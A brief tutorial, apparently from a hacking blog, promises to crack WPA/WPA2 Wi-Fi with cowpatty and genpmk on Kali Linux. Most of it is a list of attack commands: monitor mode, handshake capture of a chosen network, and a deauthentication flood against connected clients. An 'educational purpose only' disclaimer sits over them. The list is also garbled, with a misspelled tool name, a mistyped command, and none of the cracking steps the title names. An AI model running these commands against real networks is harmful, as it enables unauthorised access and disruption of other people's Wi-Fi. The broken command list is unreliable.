In this tutorial we are going to teach you How to crack WPA & WPA 2 with cowpatty and negpmk on Kali Linux. We high recommend this for research or educational purpose only.
Also Read: Crack WPA & WPA2 with Aircrack-ng on Kali Linux
This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.
Things we used for cracking WPA & WPA2:
- Alfa AWUSO36H Wireless Card
- Windows 7-64bit (works on 32bit)
- VMware Workstation
- Kali Linux 2.0
Command to crack WPA & WPA2:
airmon-ng
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0
airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up
4 comments
Comments are closed.
Add Comment